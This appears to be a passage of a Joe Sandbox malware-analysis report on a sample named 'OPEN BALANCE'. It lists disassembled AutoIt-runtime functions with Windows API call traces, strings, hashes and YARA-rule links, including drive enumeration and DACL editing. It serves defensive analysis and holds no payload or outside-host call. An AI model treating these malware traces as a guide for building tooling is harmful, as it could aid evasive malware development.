CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 008C2E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 008C2E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008C2E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008C303F

Strings

static, xrefs: 008C2D3A, 008C2E91
AutoIt v3, xrefs: 008C2CF2
, xrefs: 008C2FC5
DISPLAY, xrefs: 008C2EA2

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$Global$Rect$CreateFile$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadMessagePictureReadSendShowSizeWire
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2547915802-2373415609
Opcode ID: 422c8cf66616532f4f486637baf76e138b7a188affbecf60d2b23831b08c7849
Instruction ID: 94f8435d87aaab575e128cd3db84119fe74600886b09815934a56b9042e659ef
Opcode Fuzzy Hash: 422c8cf66616532f4f486637baf76e138b7a188affbecf60d2b23831b08c7849
Instruction Fuzzy Hash: 14024C75600219AFDB14DF68CC89EAE7BB9FB48310F048659F915EB2A1DB74ED01CB60

Function 008D70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 008D712F
GetSysColorBrush.USER32(0000000F), ref: 008D7160
GetSysColor.USER32(0000000F), ref: 008D716C
SetBkColor.GDI32(?,000000FF), ref: 008D7186
SelectObject.GDI32(?,?), ref: 008D7195
InflateRect.USER32(?,000000FF,000000FF), ref: 008D71C0
GetSysColor.USER32(00000010), ref: 008D71C8
CreateSolidBrush.GDI32(00000000), ref: 008D71CF
FrameRect.USER32(?,?,00000000), ref: 008D71DE
DeleteObject.GDI32(00000000), ref: 008D71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 008D7230
FillRect.USER32(?,?,?), ref: 008D7262
GetWindowLongW.USER32(?,000000F0), ref: 008D7284

Part of subcall function 008D73E8: GetSysColor.USER32(00000012), ref: 008D7421
Part of subcall function 008D73E8: SetTextColor.GDI32(?,?), ref: 008D7425
Part of subcall function 008D73E8: GetSysColorBrush.USER32(0000000F), ref: 008D743B
Part of subcall function 008D73E8: GetSysColor.USER32(0000000F), ref: 008D7446
Part of subcall function 008D73E8: GetSysColor.USER32(00000011), ref: 008D7463
Part of subcall function 008D73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008D7471
Part of subcall function 008D73E8: SelectObject.GDI32(?,00000000), ref: 008D7482
Part of subcall function 008D73E8: SetBkColor.GDI32(?,00000000), ref: 008D748B
Part of subcall function 008D73E8: SelectObject.GDI32(?,?), ref: 008D7498
Part of subcall function 008D73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 008D74B7
Part of subcall function 008D73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008D74CE
Part of subcall function 008D73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 008D74DB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 999f13e89dbe8ba2f5a4b379060f08465d5e95392f87ee2aab19448fa31b084d
Instruction ID: c15253ad55b49c575ddce133bccbd446390794771ae5c486b82372f5f9b6bacb
Opcode Fuzzy Hash: 999f13e89dbe8ba2f5a4b379060f08465d5e95392f87ee2aab19448fa31b084d
Instruction Fuzzy Hash: 27A18072009312AFDB119F64DC48E5BBBB9FB49321F100B1AF962D62E1E771E944CB51

Function 008C2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 008C273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008C286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008C28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008C28B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 008C2900
GetClientRect.USER32(00000000,?), ref: 008C290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 008C2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008C2964
GetStockObject.GDI32(00000011), ref: 008C2974
SelectObject.GDI32(00000000,00000000), ref: 008C2978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 008C2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008C2991
DeleteDC.GDI32(00000000), ref: 008C299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008C29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 008C29DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 008C2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008C2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 008C2A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 008C2A77
GetStockObject.GDI32(00000011), ref: 008C2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008C2A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 008C2A97

Strings

static, xrefs: 008C294F, 008C2A71
AutoIt v3, xrefs: 008C28F8
msctls_progress32, xrefs: 008C2A13
DISPLAY, xrefs: 008C295A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: a48236e17b92b956ec23e5d692acb10c9c8e92f24e30b3bdb4b0565e2b269702
Instruction ID: e8439ea99348bd4a3ef3ba54c0c612f4a98611c6d30f0efe7d925112c3e2b69d
Opcode Fuzzy Hash: a48236e17b92b956ec23e5d692acb10c9c8e92f24e30b3bdb4b0565e2b269702
Instruction Fuzzy Hash: 80B12B71A50219AFEB14DF68DC85FAEBBB9FB48710F008619FA15EB290D774E940CB50

Function 008B4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008B4AED
GetDriveTypeW.KERNEL32(?,008DCB68,?,\\.\,008DCC08), ref: 008B4BCA
SetErrorMode.KERNEL32(00000000,008DCB68,?,\\.\,008DCC08), ref: 008B4D36

Strings

Fixed, xrefs: 008B4C09
SCSI, xrefs: 008B4C8A
RAMDisk, xrefs: 008B4BF4
\\.\, xrefs: 008B4B3F
ATAPI, xrefs: 008B4C91
RAID, xrefs: 008B4CBB
USB, xrefs: 008B4CB4
Virtual, xrefs: 008B4CE5
SATA, xrefs: 008B4CD0
Removable, xrefs: 008B4C10, 008B4C15
MMC, xrefs: 008B4CDE
SAS, xrefs: 008B4CC9
1394, xrefs: 008B4C9F
FileBackedVirtual, xrefs: 008B4CEC
SSA, xrefs: 008B4CA6
CDROM, xrefs: 008B4BFB
Fibre, xrefs: 008B4CAD
ATA, xrefs: 008B4C98
SSD, xrefs: 008B4C4A
iSCSI, xrefs: 008B4CC2
Network, xrefs: 008B4C02
Unknown, xrefs: 008B4BED, 008B4C83
PhysicalDrive, xrefs: 008B4B76

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: ab521f0264493b5924fb8b1c977e9fe8a3d615fb6ef7018497b6181ade31acc3
Instruction ID: badb65f117f9f3999a324c5cb131a0517628dd883be4918a59fa3666fa11523e
Opcode Fuzzy Hash: ab521f0264493b5924fb8b1c977e9fe8a3d615fb6ef7018497b6181ade31acc3
Instruction Fuzzy Hash: 7A619E3060520A9FCB14DF28CA939BD7BA0FB45B08B24A415E806EB7D3DB35ED55DB42

Function 00858D85 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00858E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00896AC5
6F560200.COMCTL32(?,000000FF,?), ref: 00896AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00896F43

Part of subcall function 00858F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00858BE8,?,00000000,?,?,?,?,00858BBA,00000000,?), ref: 00858FC5

SendMessageW.USER32(?,00001053), ref: 00896F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00896F96

Strings

0, xrefs: 00896DCF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$Window$DestroyF560200InvalidateMoveRect
String ID: 0
API String ID: 1726311532-4108050209
Opcode ID: 631f8897636fbd1fa6ee6d2f1d4233efb46796b13cb8220f7f60ce57740c31ab
Instruction ID: 879dfce597a2af6c4b0e6dffb0e0609858e4ef0021526d78a73311423b92a2dd
Opcode Fuzzy Hash: 631f8897636fbd1fa6ee6d2f1d4233efb46796b13cb8220f7f60ce57740c31ab
Instruction Fuzzy Hash: 9C12CC30205201EFCB25EF28D845BA9B7F1FB44311F18816AF995DB261EB31EC65DB91

Function 008D73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 008D7421
SetTextColor.GDI32(?,?), ref: 008D7425
GetSysColorBrush.USER32(0000000F), ref: 008D743B
GetSysColor.USER32(0000000F), ref: 008D7446
CreateSolidBrush.GDI32(?), ref: 008D744B
GetSysColor.USER32(00000011), ref: 008D7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 008D7471
SelectObject.GDI32(?,00000000), ref: 008D7482
SetBkColor.GDI32(?,00000000), ref: 008D748B
SelectObject.GDI32(?,?), ref: 008D7498
InflateRect.USER32(?,000000FF,000000FF), ref: 008D74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008D74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 008D74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008D752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008D7554
InflateRect.USER32(?,000000FD,000000FD), ref: 008D7572
DrawFocusRect.USER32(?,?), ref: 008D757D
GetSysColor.USER32(00000011), ref: 008D758E
SetTextColor.GDI32(?,00000000), ref: 008D7596
DrawTextW.USER32(?,008D70F5,000000FF,?,00000000), ref: 008D75A8
SelectObject.GDI32(?,?), ref: 008D75BF
DeleteObject.GDI32(?), ref: 008D75CA
SelectObject.GDI32(?,?), ref: 008D75D0
DeleteObject.GDI32(?), ref: 008D75D5
SetTextColor.GDI32(?,?), ref: 008D75DB
SetBkColor.GDI32(?,?), ref: 008D75E5

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 34288d0e01f8f7bc159bd7cae56c72f9ab56b179ade5a1b72f7ca2b61689427a
Instruction ID: 8d85d24bfed65081f109b1849e4a1d9cbaf05cdada3f3a994cfc0d9a541c090a
Opcode Fuzzy Hash: 34288d0e01f8f7bc159bd7cae56c72f9ab56b179ade5a1b72f7ca2b61689427a
Instruction Fuzzy Hash: 0F614C72905219AFDF019FA4DC49EEEBFB9FB08320F114216F915AB2A1E7759940CB90

Function 008D0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 008D1128
GetDesktopWindow.USER32 ref: 008D113D
GetWindowRect.USER32(00000000), ref: 008D1144
GetWindowLongW.USER32(?,000000F0), ref: 008D1199
DestroyWindow.USER32(?), ref: 008D11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008D11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008D120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008D121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 008D1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 008D1245
IsWindowVisible.USER32(00000000), ref: 008D12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008D12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008D12D0
GetWindowRect.USER32(00000000,?), ref: 008D12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 008D130E
GetMonitorInfoW.USER32(00000000,?), ref: 008D1328
CopyRect.USER32(?,?), ref: 008D133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 008D13AA

Strings

(, xrefs: 008D131B
tooltips_class32, xrefs: 008D11E6
0, xrefs: 008D10D3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a8a2b8cde9a551e6920e3c0a6138ec730698705df9b7ac8a6bb518d9820f3f0a
Instruction ID: ecfcc459f9ceeb3a1e82c5cbc55edd791db51cb99e6f4bdb85898d6e360238ee
Opcode Fuzzy Hash: a8a2b8cde9a551e6920e3c0a6138ec730698705df9b7ac8a6bb518d9820f3f0a
Instruction Fuzzy Hash: A7B15C71604341AFDB14DF68D889B6ABBE4FF84354F008A1EF999DB261C771E844CB92

Function 008D0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008D02E5
_wcslen.LIBCMT ref: 008D031F
_wcslen.LIBCMT ref: 008D0389
_wcslen.LIBCMT ref: 008D03F1
_wcslen.LIBCMT ref: 008D0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008D04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D0504

Part of subcall function 0085F9F2: _wcslen.LIBCMT ref: 0085F9FD

Part of subcall function 008A223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008A2258
Part of subcall function 008A223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008A228A

Strings

SELECTCLEAR, xrefs: 008D052D
SELECT, xrefs: 008D0548
FINDITEM, xrefs: 008D0627
SELECTALL, xrefs: 008D0515
GETSELECTEDCOUNT, xrefs: 008D0470, 008D048B
DESELECT, xrefs: 008D059C
GETSELECTED, xrefs: 008D05E1
ISSELECTED, xrefs: 008D04DD
GETITEMCOUNT, xrefs: 008D0316, 008D0337
GETSUBITEMCOUNT, xrefs: 008D0384, 008D039F
GETTEXT, xrefs: 008D03EC, 008D0407
SELECTINVERT, xrefs: 008D057E
VIEWCHANGE, xrefs: 008D0675

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 1e9988d56b3da632d48421b203a2389e13479945cfc988ad798fe91677025f36
Instruction ID: db3531a94c22b212e2e2482825c452265b2a1b7a2df57d2d0f979164e71c4cb1
Opcode Fuzzy Hash: 1e9988d56b3da632d48421b203a2389e13479945cfc988ad798fe91677025f36
Instruction Fuzzy Hash: 89E15C316083058FC724DF28C551A2AB7E6FF98318F144A5EE896DB7A2DB30ED45CB52

Function 00858891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00858968
GetSystemMetrics.USER32(00000007), ref: 00858970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0085899B
GetSystemMetrics.USER32(00000008), ref: 008589A3
GetSystemMetrics.USER32(00000004), ref: 008589C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008589E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008589F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00858A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00858A3C
GetClientRect.USER32(00000000,000000FF), ref: 00858A5A
GetStockObject.GDI32(00000011), ref: 00858A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00858A81

Part of subcall function 0085912D: GetCursorPos.USER32(?), ref: 00859141
Part of subcall function 0085912D: ScreenToClient.USER32(00000000,?), ref: 0085915E
Part of subcall function 0085912D: GetAsyncKeyState.USER32(00000001), ref: 00859183
Part of subcall function 0085912D: GetAsyncKeyState.USER32(00000002), ref: 0085919D

SetTimer.USER32(00000000,00000000,00000028,008590FC), ref: 00858AA8

Strings

AutoIt v3 GUI, xrefs: 00858A20

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: fcef43b94d62af7fc75bfa4b9b02678298f0448c3f79e8770088c5a752e6ccf9
Instruction ID: 9df406f9afed4b38e23c4e69b87df6b902b4069baa6e0fe611bf1ec09c7eb9e8
Opcode Fuzzy Hash: fcef43b94d62af7fc75bfa4b9b02678298f0448c3f79e8770088c5a752e6ccf9
Instruction Fuzzy Hash: 11B15831A0020AEFDF14DFA8DC45BAE3BB5FB48315F14822AFA15E7290DB34A841CB51

Function 008A0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008A1114
Part of subcall function 008A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,008A0B9B,?,?,?), ref: 008A1120
Part of subcall function 008A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008A0B9B,?,?,?), ref: 008A112F
Part of subcall function 008A10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008A1136
Part of subcall function 008A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008A114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008A0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008A0E29
GetLengthSid.ADVAPI32(?), ref: 008A0E40
GetAce.ADVAPI32(?,00000000,?), ref: 008A0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008A0E96
GetLengthSid.ADVAPI32(?), ref: 008A0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 008A0EB5
RtlAllocateHeap.NTDLL(00000000), ref: 008A0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 008A0EDD
CopySid.ADVAPI32(00000000), ref: 008A0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008A0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008A0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008A0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008A0F6E
HeapFree.KERNEL32(00000000), ref: 008A0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008A0F7E
HeapFree.KERNEL32(00000000), ref: 008A0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008A0F8E
HeapFree.KERNEL32(00000000), ref: 008A0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 008A0FA1
HeapFree.KERNEL32(00000000), ref: 008A0FA8

Part of subcall function 008A1193: GetProcessHeap.KERNEL32(00000008,008A0BB1,?,00000000,?,008A0BB1,?), ref: 008A11A1
Part of subcall function 008A1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008A11A8
Part of subcall function 008A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008A0BB1,?), ref: 008A11B7

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
